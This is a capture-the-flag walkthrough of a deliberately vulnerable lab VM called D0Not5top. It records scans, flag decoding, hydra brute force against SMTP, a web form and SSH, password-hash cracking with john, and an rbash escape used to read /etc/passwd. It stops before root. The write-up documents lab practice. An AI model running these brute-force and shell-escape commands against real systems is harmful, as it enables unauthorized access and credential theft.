Walkthrough by DigiP

Thanks to DigiP for sending me this walkthrough write-up. You really helped me iron out the kinks in this one ;D

(Note: Target IP changes multiple times, as DigiP had revisted this multiple times)

netdiscover
192.168.1.135   08:00:27:de:4c:05      4     240  PCS Systemtechnik Gmb
 
nmap -sC -p- -A --open -T4 192.168.1.135
 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-08 20:05 EDT
Nmap scan report for D0Not5top (192.168.1.135)
Host is up (0.00042s latency).
Not shown: 65529 closed ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
|   1024 a7:52:df:39:80:7c:66:16:2f:fd:f7:7b:80:13:09:85 (DSA)
|   2048 bf:d9:5a:22:54:91:cc:36:40:3c:e6:35:4f:8e:0c:78 (RSA)
|_  256 16:e6:84:e1:5f:80:bc:27:6a:50:01:55:f0:c0:cc:72 (ECDSA)
25/tcp    open  smtp    Exim smtpd
| smtp-commands: D0Not5top Hello D0Not5top [192.168.1.66], SIZE 52428800, 8BITMIME, PIPELINING, HELP,
|_ Commands supported: AUTH HELO EHLO MAIL RCPT DATA NOOP QUIT RSET HELP
53/tcp    open  domain  PowerDNS 3.4.1
| dns-nsid:
|   NSID: D0Not5top (44304e6f7435746f70)
 
echo 44304e6f7435746f70 | xxd -r -p
D0Not5top
 
|   id.server: D0Not5top
|_  bind.version: PowerDNS Authoritative Server 3.4.1 ([email protected] built 20170111224403 [email protected])
80/tcp    open  http    Apache httpd
| http-robots.txt: 22 disallowed entries (15 shown)
| /games /dropbox /contact /blog/wp-login.php
| /blog/wp-admin /search /support/search.php
| /extend/plugins/search.php /plugins/search.php /extend/themes/search.php
|_/themes/search.php /support/rss /archive/ /wp-admin/ /wp-content/
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          42637/tcp  status
|_  100024  1          49367/udp  status
42637/tcp open  status  1 (RPC #100024)
MAC Address: 08:00:27:DE:4C:05 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
TRACEROUTE
HOP RTT     ADDRESS
1   0.42 ms D0Not5top (192.168.1.135)
 
nikto -h 192.168.1.135
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.135
+ Target Hostname:    192.168.1.135
+ Target Port:        80
+ Start Time:         2017-04-08 20:19:58 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache
+ Server leaks inodes via ETags, header found with file /, fields: 0xd3 0x54c550ee22d56
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3268: /games/: Directory indexing found.
+ Entry '/games/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/dropbox/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/contact/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/search/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/archive/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/wp-admin/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/wp-content/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/wp-includes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/comment-page-/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/trackback/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/xmlrpc.php' in robots.txt returned a non-forbidden or redirect HTTP code (301)
+ Entry '/blackhole/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/mint/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/feed/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 26 entries which should be manually viewed.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3092: /archive/: This might be interesting...
+ OSVDB-3092: /support/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-admin/: Admin login page/section found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 7563 requests: 0 error(s) and 28 item(s) reported on remote host
+ End Time:           2017-04-08 20:20:13 (GMT-4) (15 seconds)
---------------------------------------------------------------------------
 
view-source:http://192.168.1.135/
 
<h1>
#########################################<br>
# D0Not5top UnT1l Y0uw H4v3 Cr4cK3d L45T_fl46.pl F1l3 #<br>
#########################################
</h1>
<h3>3nj0iy H0p35 Y0iu D0<br>
Mucho 3mrgnc3 :D
</h3>
 
curl -v -X OPTIONS http://192.168.1.135/games/
 
 
http://192.168.1.135/phpmyadmin/
 
wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt --hc 404,301 http://192.168.1.135/FUZZ/
 
We find:
http://192.168.1.135/control/
 
 <!-- FL46_1:urh8fu3i039rfoy254sx2xtrs5wc6767w -->
 
gobuster -u http://192.168.1.28/control/ -f -e -x html,jpg,css,txt,png,gif,lock,zip,git,php -w /usr/share/wordlists/dirb/common.txt
 
http://192.168.1.28/control/hosts.txt
127.0.0.1   localhost
127.0.0.1   D0Not5top.ctf
#127.0.0.1       MadBroAdN1n.ctf ## AD105 M0F05
 
# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
 
gobuster -u http://192.168.1.28 -f -e -x php,html,txt -w /mnt/HDD2/wordlists/drupal-modules.lst
 
 
http://192.168.1.28/poweradmin/ (Status: 200)
Throwing some more wordlists at the site we find a new directory! "poweradmin"
 
http://192.168.1.28/poweradmin/
 
Looking at https://github.com/poweradmin/poweradmin I can see what directories I might not find locally. /sql looks interesting but none of the passwords
seem to work for the login page.
 
Eventually, I gave up, as I have no idea what the user name is, so bruting seems less desirable at the moment.
 
Back to http://192.168.1.28/control/ view source
 
<!-- M3gusta said he hasn't had time to get this w0rKING. Don't think he's quite in the 20n3 these days since his MadBro made that 7r4n5f3r,
Just Couldnt [email protected] Da D0Not5topMe.ctf --!>
 
http://192.168.1.28/control/js/
 
http://192.168.1.135/control/js/README.MadBro
 
 
###########################################################
# MadBro MadBro MadBro MadBro MadBro MadBro MadBro MadBro #
# M4K3 5UR3 2 S3TUP Y0UR /3TC/H05T5 N3XT T1M3 L0053R...   #
# 1T'5 D0Not5topMe.ctf !!!!                               #
# 1M 00T4 H33R..                                          #
# MadBro MadBro MadBro MadBro MadBro MadBro MadBro MadBro #
###########################################################
 
                FL101110_10:111101011101    > FL46_2:30931r42q2svdfsxk9i13ry4f2srtr98h2 (not sure if this is right, but its a flag)
                1r101010q10svdfsxk1001i1    >
                11ry100f10srtr1100010h10    >
 
 
                                             
Logging into 192.168.1.135 on port 25, we see what seems to be a string of hexadecimal. Decoding it we get our 3rd flag:
FL46_3:29dryf67uheht2r1dd4qppuey474svxya This would be flag 3??
 
Set an entry in our hosts file to:
192.168.1.135   d0not5topme.ctf
 
Then navigate to http://d0not5topme.ctf which loads a phpBB forum page
 
<a class="feed-icon-forum" title="Feed - Worka Suko Gameo Di Besto" href="/app.php/feed?sid=f1b832bd60328d4410df85af71af7da0?f=1">
<i class="icon fa-rss-square fa-fw icon-orange" aria-hidden="true"></i><span class="sr-only">Feed - Worka Suko Gameo Di Besto</span>
</a>
 
 
http://D0Not5topMe.ctf/adm/ (Status: 302)
http://D0Not5topMe.ctf/assets/ (Status: 200)
http://D0Not5topMe.ctf/bin/ (Status: 200)
http://D0Not5topMe.ctf/cache/ (Status: 200)
http://D0Not5topMe.ctf/common.php (Status: 200)
http://D0Not5topMe.ctf/composer.lock (Status: 200)
http://D0Not5topMe.ctf/config/ (Status: 200)
http://D0Not5topMe.ctf/config.php (Status: 200)
http://D0Not5topMe.ctf/cron.php (Status: 200)
http://D0Not5topMe.ctf/docs/ (Status: 200)
http://D0Not5topMe.ctf/download/ (Status: 200)
http://D0Not5topMe.ctf/ext/ (Status: 200)
http://D0Not5topMe.ctf/faq.php (Status: 301)
http://D0Not5topMe.ctf/files/ (Status: 200)
http://D0Not5topMe.ctf/feed.php (Status: 301)
http://D0Not5topMe.ctf/images/ (Status: 200)
http://D0Not5topMe.ctf/includes/ (Status: 200)
http://D0Not5topMe.ctf/index.php/ (Status: 200)
http://D0Not5topMe.ctf/index.php (Status: 200)
http://D0Not5topMe.ctf/language/ (Status: 200)
http://D0Not5topMe.ctf/manual/ (Status: 200)
http://D0Not5topMe.ctf/mcp.php (Status: 200)
http://D0Not5topMe.ctf/phpBB3/ (Status: 200)
http://D0Not5topMe.ctf/phpbb/ (Status: 200)
http://D0Not5topMe.ctf/posting.php (Status: 200)
http://D0Not5topMe.ctf/report.php (Status: 301)
http://D0Not5topMe.ctf/search.php (Status: 200)
http://D0Not5topMe.ctf/store/ (Status: 200)
http://D0Not5topMe.ctf/styles/ (Status: 200)
http://D0Not5topMe.ctf/ucp.php (Status: 200)
http://D0Not5topMe.ctf/vendor/ (Status: 200)
http://D0Not5topMe.ctf/viewonline.php (Status: 200)
 
wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt --hc 404,301 http://d0not5topme.ctf/FUZZ/
http://d0not5topme.ctf/bin/phpbbcli.php
 
#!/usr/bin/env php
This program must be run from the command line.
 
Try to register on forums, force an error in the form we get the email address for a new host
http://d0not5topme.ctf/ucp.php?mode=register&sid=f1b832bd60328d4410df85af71af7da0
 
[email protected]
 
 
Discovered user "Megusta" on the phpBB by adding as a friend, and site confirmed in friends list. Wrong names, show error.
 
http://d0not5topme.ctf/ucp.php?mode=sendpassword
reset password for "Megusta" with email "[email protected]"
If only we could find a way to read that email.
 
 
hydra -s 25 -l [email protected] -P /root/passwords/siph0n.txt -t 1 -w 20 -f 192.168.1.28 smtp  
 
Normally for POP3 email, we'd want to login over 110, but for sending, we can verify a user and pass using port 25, smtp.
https://securityblog.gr/2067/brute-forcing-smtp-with-hydra/
This may be fruitless, as the op may have never actually setup an email account for that user, but we try just in case
which could help us verify the password(if reused) quicker than butting heads against the 3 try lockout via phpbb.
 
After trying manually, AUTH LOGIN does not seem to be enabled, and no relay is allowed, so brute forcing looks to be a no go adn waste of time.
 
Moving on, new host:
 
192.168.1.135   G4M35.ctf
 
http://g4m35.ctf/
 
in the browser console, we can hack the game to build no walls to beat the game
MG.BARRIER_PATH_IDS = {}
MG.BARRIER_PATH_IDS[MG.BarrierType.RANDOM] = '';
MG.BARRIER_PATH_IDS[MG.BarrierType.BARRIER_1] = 'barrier-path-blank';
MG.BARRIER_PATH_IDS[MG.BarrierType.BARRIER_2] = 'barrier-path-blank';
MG.BARRIER_PATH_IDS[MG.BarrierType.BARRIER_3] = 'barrier-path-blank';
MG.BARRIER_PATH_IDS[MG.BarrierType.BARRIER_4] = 'barrier-path-blank';
MG.BARRIER_PATH_IDS[MG.BarrierType.BARRIER_5] = 'barrier-path-blank';
MG.BARRIER_PATH_IDS[MG.BarrierType.BARRIER_6] = 'barrier-path-blank';
MG.BARRIER_PATH_IDS[MG.BarrierType.BLANK] = 'barrier-path-blank';
MG.BARRIER_PATH_IDS[MG.BarrierType.START] = 'barrier-path-blank';
MG.BARRIER_PATH_IDS[MG.BarrierType.FINISH] = 'barrier-path-finish';
 
We can shortcut this in game.js and look for:
 GAME_OVER: {
            title: function () {return '/H3x6L64m3';},
 
This will lead us to the directory for http://g4m35.ctf/H3x6L64m3/
 
 
http://g4m35.ctf/H3x6L64m3/
 
wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt --hc 404,301 http://g4m35.ctf/H3x6L64m3/FUZZ/
 
Fuzzing, we find the textures directory and grab the bit of octal code embeded in the images for the second game. we get flag 5.
http://g4m35.ctf/H3x6L64m3/textures/skybox/dawnclouds/nz.jpg
http://g4m35.ctf/H3x6L64m3/textures/skybox/dawnclouds/pz.jpg
 
The decoded octal code in the above images reads:
FL46_5:09k87h6g4e25gh44wa1rybyfi898hncdt
 
After beating the next game, you get another URL for our hosts file as a watermark at the end. (I suggest you get ready to hit print screen at the end of the race to see the URL)
 
We add to hosts file.
 
192.168.1.135   t3rm1n4l.ctf
 
http://t3rm1n4l.ctf/
 
You can also find the URL in - http://g4m35.ctf/H3x6L64m3/bkcore/hexgl/Gameplay.js line 174
 
password required. did we get one?
 
http://t3rm1n4l.ctf/
 
curl -v -X POST 'http://t3rm1n4l.ctf/term.php' -H 'Pragma: no-cache' -H 'Origin: http://t3rm1n4l.ctf' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.8' -H 'User-Agent: GameTerminal' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'Accept: */*' -H 'Cache-Control: no-cache' -H 'X-Requested-With: XMLHttpRequest' -H 'Connection: keep-alive' -H 'Referer: http://t3rm1n4l.ctf/index.php' -H 'DNT: 1' --data 'command=a -lash' --compressed
 
wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt --hc 404,301,400 http://t3rm1n4l.ctf/FUZZ.php
 
wfuzz -c -z file,/root/passwords/10_million_password_list_top_1000000.txt --hc 404,301,400 http://t3rm1n4l.ctf/FUZZ.php
 
source code for our terminal emulator:
https://github.com/Fluidbyte/PHP-jQuery-Terminal-Emulator/blob/master/term.php
 
I had to test this to be sure, as I tried the URL in the field for the password, and recieved AUTHENTICO! so I used hydra just to be sure.
 
hydra -l "" -p t3rm1n4l.ctf t3rm1n4l.ctf http-post-form "/term.php:command=^PASS^:t3rm1n4l.ctf Passwordo Requireo"
Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
 
Hydra (http://www.thc.org/thc-hydra) starting at 2017-04-09 13:08:21
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 1 task per 1 server, overall 64 tasks, 1 login try (l:1/p:1), ~0 tries per task
[DATA] attacking service http-post-form on port 80
[80][http-post-form] host: t3rm1n4l.ctf   password: t3rm1n4l.ctf
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-04-09 13:08:32
 
 
will only execute few commands it seems
 
We can test this again with curl
curl -v -X POST http://t3rm1n4l.ctf/term.php --data "command=t3rm1n4l.ctf"
Note: Unnecessary use of -X or --request, POST is already inferred.
*   Trying 192.168.1.135...
* TCP_NODELAY set
* Connected to t3rm1n4l.ctf (192.168.1.135) port 80 (#0)
> POST /term.php HTTP/1.1
> Host: t3rm1n4l.ctf
> User-Agent: curl/7.52.1
> Accept: */*
> Content-Length: 20
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 20 out of 20 bytes
< HTTP/1.1 200 OK
< Date: Sun, 09 Apr 2017 13:06:24 GMT
< Server: Apache
< Set-Cookie: PHPSESSID=fleo1km3g37osr53jqkd6u7687; expires=Sun, 09-Apr-2017 13:06:34 GMT; Max-Age=10; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< Vary: Accept-Encoding
< Transfer-Encoding: chunked
< Content-Type: text/html; charset=UTF-8
<
* Curl_http_done: called premature == 0
* Connection #0 to host t3rm1n4l.ctf left intact
AUTHENTICO!
 
So. Authenticated, but what commands can we run to get the next flag????
 
 
 
http://t3rm1n4l.ctf
 
t3rm1n4l.ctf Passwordo Requireo:
password
t3rm1n4l.ctf Passwordo Requireo:
dir
t3rm1n4l.ctf Passwordo Requireo:
pwd
t3rm1n4l.ctf Passwordo Requireo:
t3rm1n4l.ctf
AUTHENTICO!
dir
ERROR: Megusto ere no no!
pwd
/usr/share/nginx/html
dir
t3rm1n4l.ctf Passwordo Requireo:
pwd
t3rm1n4l.ctf Passwordo Requireo:
t3rm1n4l.ctf
AUTHENTICO!
pwd
/usr/share/nginx/html
 
 
6 commands seem to work, but do nothing really.
pwd, uname, grep, id, ip, and who
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
 
who returns empty until you hit enter twice for some reason. Basic commands like ls, cat, nano, echo, etc, all return:
ERROR: Megusto ere no no!
 
I realized after playing with these commands, it's stripping all punctuation. It didn't however strip *
 
I tried:
grep * *
grep: BBBBBBBBBBB: Is a directory
grep: CCCCCCCCCCC: Is a directory
grep: M36u574.ctf: Is a directory
grep: XXXXXXXXXXX: Is a directory
grep: YYYYYYYYYYY: Is a directory
grep: ZZZZZZZZZZZ: Is a directory
grep: AAAAAAAAAAA: Is a directory
grep: BBBBBBBBBBB: Is a directory
grep: CCCCCCCCCCC: Is a directory
grep: M36u574.ctf: Is a directory
grep: XXXXXXXXXXX: Is a directory
grep: YYYYYYYYYYY: Is a directory
grep: ZZZZZZZZZZZ: Is a directory
 
boom!
 
We got another domain name to add to our hosts file!
 
M36u574.ctf
 
(each of these domains exhibits something a little different)
 
When first viewing the site, we see a series of images scrolling by. It's actually refreshing the page and loading a new image each time. One of the ones is kingmegusta.jpg We run exiftool and grab the comments, which are base64 encoded. Decoding, we get a password hash.
 
exiftool kingmegusta.jpg
MeGustaKing:$6$e1.2NcUo$96SfkpUHG25LFZfA5AbJVZjtD4fs6fGetDdeSA9HRpbkDw6y5nauwMwRNPxQnydsLzQGvYOU84B2nY/O40pZ30
 
We fire up john(although I have a feeling this password, is trolling us with something something megusta)
john hashes -w=/root/passwords/siph0n.txt --fork=16
 
MeGustaKing:**********
 
password is "**********" 10 asterisks.
 
Op is straight up trolling us..dickbutt.
 
[email protected]:~/ctf/D0Not5top# ssh MeGustaKing[email protected]
 
 
[email protected]'s password:
ERROR!
TRACE: sshPr0xy.py line:550 <CODE>U2FsdGVkX1/YeThqAKjM7EUtV9BS+1vJ3nDY6rrwabQ4OCQQJgFGE9/AI0uiCGahRoXFa4l6+wv4yzc2U+cReg==</CODE>
 
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
 
Last login:Sat Apr  1 00:00:01 2017 from R0cKy0U.7x7
Welcome to rush shell
Lets you update your FunNotes and more!
 
Uh0h.. u n0 burtieo
h35 da 54wltyD4w6 y0u...
Gw04w4y :(
Local configuration error occurred.
Contact the systems administrator for further assistance.
Connection to 192.168.1.28 closed.
 
U2FsdGVkX1/YeThqAKjM7EUtV9BS+1vJ3nDY6rrwabQ4OCQQJgFGE9/AI0uiCGahRoXFa4l6+wv4yzc2U+cReg==
 
 
 
After some time playing on this, op messaged me on twitter. There is
a typo on the flag 6 from our ssh error message. The following, is what it should have been. Thanks op..
 
U2FsdGVkX1/vv715OGrvv73vv73vv71Sa3cwTmw4Mk9uQnhjR1F5YW1adU5ISjFjVEZ2WW5sMk0zUm9kemcwT0hSbE5qZDBaV3BsZVNBS++/ve+/ve+/vWnvv704OCQmCg==
 
echo U2FsdGVkX1/vv715OGrvv73vv73vv71Sa3cwTmw4Mk9uQnhjR1F5YW1adU5ISjFjVEZ2WW5sMk0zUm9kemcwT0hSbE5qZDBaV3BsZVNBS++/ve+/ve+/vWnvv704OCQmCg== | base64 -d
Salted__�y8j���Rkw0Nl82OnBxcGQyamZuNHJ1cTFvYnl2M3Rodzg0OHRlNjd0ZWpleSAK���i�88$&
 
echo Rkw0Nl82OnBxcGQyamZuNHJ1cTFvYnl2M3Rodzg0OHRlNjd0ZWpleSAK | base64 -d
 
And we have flag 6. Still, need a way in to get root as the 7th and final flag is gained after rooting the box.
FL46_6:pqpd2jfn4ruq1obyv3thw848te67tejey
 
Looks like the name it wants might be burtieo. What the password is though, i don't know, but R0cKy0U.7x7 probably refers to the rockyou.txt wordlist.
 
I first grepped this for certain words combined with my own, as the whole rockyou list, would take like 40 days to brute over ssh... XD
 
hydra -l burtieo -P /mnt/HDD2/ctf/D0Not5top/passwords ssh://192.168.1.28
no go,so trying whole rockyou.txt list and hoping it's in the top of the file.
 
 
hydra -l burtieo -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.28
 
[22][ssh] host: 192.168.1.28   login: burtieo   password: Lets you update your FunNotes and more!
 
 
ssh [email protected]
[email protected]'s password:
"Lets you update your FunNotes and more!"
 
ERROR!
TRACE: sshPr0xy.py line:550 <CODE>U2FsdGVkX1/YeThqAKjM7EUtV9BS+1vJ3nDY6rrwabQ4OCQQJgFGE9/AI0uiCGahRoXFa4l6+wv4yzc2U+cReg==</CODE>
 
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
 
Last login:Sat Apr  1 00:00:01 2017 from R0cKy0U.7x7
Welcome to rush shell
Lets you update your FunNotes and more!
 
Uh0h.. u n0 burtieo
h35 da 54wltyD4w6 y0u...
Gw04w4y :(
W2wC0m3 Bw3rtie0 :)
[email protected]:~$ id
-rbash: id: command not found
[email protected]:~$
 
 
rbash shell is no fun and he's further restricted us from using / and other syntax.
 
password:
Lets you update your FunNotes and more!
 
 
So far here is what I have found
[email protected]:~$ pwd
/home/burtie
[email protected]:~$ export
declare -x HOME="/home/burtie"
declare -x LANG="en_GB.UTF-8"
declare -x LANGUAGE="en_GB:en"
declare -x LOGNAME="burtieo"
declare -x LS_COLORS="rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.axv=01;35:*.anx=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.axa=00;36:*.oga=00;36:*.spx=00;36:*.xspf=00;36:"
declare -x MAIL="/var/mail/burtieo"
declare -x OLDPWD
declare -rx PATH="/usr/sbin/bin"
declare -x PWD="/home/burtie"
declare -rx SHELL="/bin/rbash"
declare -x SHLVL="1"
declare -x SSH_CLIENT="192.168.1.66 52682 22"
declare -x SSH_CONNECTION="192.168.1.66 52682 192.168.1.28 22"
declare -x SSH_TTY="/dev/pts/0"
declare -x TERM="xterm-256color"
declare -x USER="burtieo"
[email protected]:~$
 
Read/cat files :)
 
 echo "$(</etc/passwd)"
or
  printf "%s" "$(<filename)"
 
 
echo "$(</etc/passwd)"
 
[email protected]:~$  echo "$(</etc/passwd)"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Debian-exim:x:104:109::/var/spool/exim4:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
statd:x:106:65534::/var/lib/nfs:/bin/false
avahi-autoipd:x:107:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
burtieo:x:1000:1000:burtie,,,:/home/burtie:/bin/rbash
pdns:x:109:116:PowerDNS,,,:/var/spool/powerdns:/bin/false
mysql:x:110:117:MySQL Server,,,:/nonexistent:/bin/false
MeGustaKing:x:1001:1001::/King:/usr/sbin/rush
dnsmasq:x:111:65534:dnsmasq,,,:/var/lib/misc:/bin/false
[email protected]:~$
 
echo "$(</etc/shadow)"
denied.
 
echo "$(</etc/*ele*)"
 
[email protected]:~$ echo "$(</etc/*ele*)"
PRETTY_NAME="Debian GNU/Linux 8 (jessie)"
NAME="Debian GNU/Linux"
VERSION_ID="8"
VERSION="8 (jessie)"
ID=debian
HOME_URL="http://www.debian.org/"
SUPPORT_URL="http://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"
 
 
[email protected]:~$ printf '%b\n' "$(</etc/group)"
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:burtie
floppy:x:25:burtie
tape:x:26:
sudo:x:27:
audio:x:29:burtie
dip:x:30:burtie
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:burtie
sasl:x:45:
plugdev:x:46:burtie
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
input:x:101:
systemd-journal:x:102:
systemd-timesync:x:103:
systemd-network:x:104:
systemd-resolve:x:105:
systemd-bus-proxy:x:106:
crontab:x:107:
netdev:x:108:burtie
Debian-exim:x:109:
messagebus:x:110:
mlocate:x:111:
ssh:x:112:
avahi-autoipd:x:113:
bluetooth:x:114:burtie
ssl-cert:x:115:
burtie:x:1000:
pdns:x:116:
mysql:x:117:
 
Lets you update your FunNotes and more!
 
echo "$(</home/bertieo/\.*)"
 
printf '%b\n' "$(<.bashrc)"
 
[email protected]:~$ printf '%b\n' "$(<.bashrc)"
-rbash: printf: missing unicode digit for \u
-rbash: printf: missing unicode digit for \u
-rbash: printf: missing unicode digit for \u
£ ~/.bashrc: executed by bash(1) for non-login shells.
£ see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
£ for examples
 
£ If not running interactively, don't do anything
case $- in
    *i*) ;;
      *) return;;
esac
 
£ don't put duplicate lines or lines starting with space in the history.
£ See bash(1) for more options
HISTCONTROL=ignoreboth
 
£ append to the history file, don't overwrite it
shopt -s histappend
 
£ for setting history length see HISTSIZE and HISTFILESIZE in bash(1)
HISTSIZE=1000
HISTFILESIZE=2000
 
£ check the window size after each command and, if necessary,
£ update the values of LINES and COLUMNS.
shopt -s checkwinsize
 
£ If set, the pattern "**" used in a pathname expansion context will
£ match all files and zero or more directories and subdirectories.
£shopt -s globstar
 
